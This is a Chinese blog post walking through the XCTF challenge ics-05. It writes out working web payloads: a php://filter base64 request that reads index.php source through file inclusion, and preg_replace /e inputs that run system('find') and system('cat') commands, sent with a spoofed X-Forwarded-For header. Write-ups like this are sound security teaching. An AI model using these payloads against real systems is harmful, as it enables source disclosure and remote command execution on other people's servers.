码迷,mamicode.com
首页 > 其他好文 > 详细

攻防世界 ics-05

时间:2019-12-09 19:07:37      阅读:183      评论:0      收藏:0      [点我收藏+]

标签:cat   com   工控   war   出现   index   ase   利用   load   

攻防世界 ics-05


 

题目描述:其他破坏者会利用工控云管理系统设备维护中心的后门入侵系统

1.进入工控云管理系统设备维护中心(其他标签点击无反应)

技术图片

 

2.查看源码无果发现可以点击 云平台维护中心 url出现page=index

想到文件包含漏洞(URL中出现path、dir、file、pag、page、archive、p、eng、语言文件等相关关键字眼)

技术图片

3.利用php伪协议查看源码  出现一段base64源码,进行转码得出源码

?page=php://filter/read=convert.base64-encode/resource=index.php

base64在线解码  http://tool.chinaz.com/Tools/Base64.aspx

技术图片

解码得到(简略)

技术图片

 

4.利用pre_replace漏洞(参数pattern输入/e的时候 ,参数replacement的代码当作PHP代码执行)

使用burpsuite进行抓包,设置X-Forwarded-For:127.0.0.1并构造payload得到./s3chahahaDir/flag

/index.php?pat=/123/e&rep=system("find+-iname+flag")&sub=12

 技术图片

5../s3chahahaDir/flag代入payload得出flag

index.php?pat=/123/e&rep=system("cat+./s3chahahaDir/flag/flag.php")&sub=123

技术图片



 

参考文章

https://www.cnblogs.com/gaonuoqi/p/11386346.html

 

 

攻防世界 ics-05

标签:cat   com   工控   war   出现   index   ase   利用   load   

原文地址:https://www.cnblogs.com/fdgmy/p/12012722.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!